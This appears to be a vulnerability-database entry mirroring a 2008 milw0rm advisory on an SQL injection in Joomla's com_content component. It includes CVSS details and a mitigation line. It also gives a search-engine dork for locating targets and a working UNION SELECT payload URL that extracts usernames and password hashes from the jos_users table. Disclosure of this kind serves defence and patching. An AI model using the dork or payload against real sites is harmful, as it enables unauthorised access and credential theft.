Joomla Component com_content SQL Injection Vulnerabity

vendor:

Joomla CMS

by:

unknown_styler

7.5

CVSS

HIGH

SQL Injection

CWE

Product Name: Joomla CMS

Affected Version From: 1.0.0

Affected Version To: 1.0.0

Patch Exists: YES

Related CWE: N/A

CPE: a:joomla:joomla

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

Joomla Component com_content SQL Injection Vulnerabity

An SQL injection vulnerability exists in the com_content component of Joomla! CMS. An attacker can send a specially crafted request to the vulnerable application in order to execute arbitrary SQL commands in application's database. This can be exploited to disclose sensitive information from the database, modify data, compromise the integrity of data, and potentially compromise the underlying system.

Mitigation:

Input validation should be used to prevent SQL injection attacks. All user-supplied input should be validated and filtered before being used in SQL queries.

Source

Exploit-DB raw data:

-------------------------------------------------------------------------------------------
                                				
   Joomla Component com_content SQL Injection Vulnerabity
                                				
-------------------------------------------------------------------------------------------


 Author    :  unknown_styler

 Dork      :  inurl:com_content

 POC        : http://localhost/index.php?option=index.php?option=com_content&task=blogcategory&id=60&Itemid={SQL}

 Example    : http://localhost/index.php?option=com_content&task=blogcategory&id=60&Itemid=99999%20union%20select%201,concat_ws(0x3a,username,password),3,4,5%20from%20jos_users/*

------------------------------------------------------------------------------------------------------------------------------------

                                         Greetings :  h4ck-y0u.org

side note:

<name>PÃ¡gina de contenido</name>
<author>Projecte Joomla!</author>
<creationDate>July 2004</creationDate>
<copyright>(C) 2005 Open Source Matters. All rights reserved.</copyright>
<license>http://www.gnu.org/copyleft/gpl.html GNU/GPL</license>
<authorEmail>admin@joomla.org</authorEmail>
<authorUrl>www.joomla.org</authorUrl>
<version>1.0.0</version>

# milw0rm.com [2008-07-08]